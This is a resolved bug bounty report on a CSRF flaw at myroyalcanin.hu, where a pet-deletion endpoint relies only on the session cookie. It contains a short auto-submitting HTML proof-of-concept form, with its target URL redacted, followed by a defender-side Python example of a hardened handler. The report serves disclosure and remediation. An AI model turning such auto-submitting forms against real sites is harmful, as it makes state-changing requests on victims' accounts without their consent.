CSRF to delete a pet
Medium
Mars
Team Summary
Official summary from Mars
A vulnerability was reported where the ██████████ API endpoint at myroyalcanin.hu is vulnerable to Cross-Site Request Forgery (CSRF) attacks. This vulnerability allows an attacker to delete a pet from a victim's account without their knowledge or consent.
Reported by
dd_06
Vulnerability Details
## Summary:
The `/kisallataim/ANIMAL_ID/delete` API endpoint at **myroyalcanin.hu** is vulnerable to Cross-Site Request Forgery attacks.
This vulnerability allows an attacker to delete a pet from the victim's account.
(Sorry for my English, I'm French)
## Proof-of-Concept (PoC)
```html
<html>
  <body>
    <!-- The action is redacted in the report; it is the /kisallataim/ANIMAL_ID/delete URL.
         The form has no method attribute, so the browser issues a GET request and
         attaches the victim's session cookie to it. -->
    <form action="████">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submits as soon as the page loads; no user interaction is needed.
      document.forms[0].submit();
    </script>
  </body>
</html>
```
You have to replace **ANIMAL_ID** with the ID of the victim's pet you wish to delete.
## Impact
An attacker can exploit this CSRF in order to delete the victim's pet.
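The following is an added defender-side example, not code from the report or from the myroyalcanin.hu application. It models a handler for an endpoint shaped like `/kisallataim/ANIMAL_ID/delete`: the vulnerable version relies only on the session cookie, so the report's auto-submitting form succeeds, while the hardened version refuses GET, verifies a session-bound synchronizer token, and checks the `Origin` header. The session id, pet id `4242`, `SITE_ORIGIN`, and the in-memory stores are all constructed for the demonstration.

```python
"""Added example: vulnerable vs. hardened pet-deletion handler (constructed data)."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://myroyalcanin.hu"          # assumed origin of the real site
SERVER_SECRET = secrets.token_bytes(32)          # per-deployment secret for token derivation
SESSIONS = {"sess-victim": {"user": "victim"}}   # constructed session store
PETS: dict = {}                                   # user -> {animal_id: pet name}


def reset_pets() -> None:
    """Restore the constructed sample data (hypothetical animal id 4242)."""
    PETS.clear()
    PETS["victim"] = {"4242": "Rex"}


@dataclass
class Request:
    method: str
    path: str
    cookies: dict
    form: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


def animal_id_from(path: str) -> str:
    # /kisallataim/<ANIMAL_ID>/delete -> "<ANIMAL_ID>"
    return path.split("/")[2]


def delete_pet_vulnerable(req: Request) -> int:
    """Mirrors the reported weakness: the only check is the session cookie,
    which the browser attaches to a cross-site GET exactly as it does on-site."""
    session = SESSIONS.get(req.cookies.get("session"))
    if session is None:
        return 401
    PETS[session["user"]].pop(animal_id_from(req.path), None)
    return 200


def csrf_token_for(session_id: str) -> str:
    """Synchronizer token bound to the session via HMAC, so it cannot be guessed
    or replayed across accounts. The site embeds it in its own delete form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def delete_pet_hardened(req: Request) -> int:
    """Three layered checks; any one of them stops the auto-submitting form."""
    if req.method != "POST":                       # state changes never on GET
        return 405
    session_id = req.cookies.get("session")
    session = SESSIONS.get(session_id)
    if session is None:
        return 401
    origin = req.headers.get("Origin")             # browsers add Origin to cross-site POSTs
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token_for(session_id)):
        return 403
    PETS[session["user"]].pop(animal_id_from(req.path), None)
    return 200


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session. SameSite=Lax keeps the cookie off
    cross-site POSTs and subresource requests, but it is still sent on
    top-level GET navigations, which is the case the report's form triggers."""
    return f"session={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


if __name__ == "__main__":
    reset_pets()
    forged = Request("GET", "/kisallataim/4242/delete", {"session": "sess-victim"})
    print("vulnerable handler:", delete_pet_vulnerable(forged), PETS)
    reset_pets()
    print("hardened handler:", delete_pet_hardened(forged), PETS)
```

The ordering of the hardened checks matters for this particular report: because the PoC form defaults to GET, `SameSite=Lax` on the session cookie would not have stopped it on its own, so rejecting non-POST methods on state-changing endpoints is the first line, and the token check is what remains effective even if an attacker switches the form to POST.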
Report Details
State
Closed
Substate
Resolved
Weakness
Cross-Site Request Forgery (CSRF)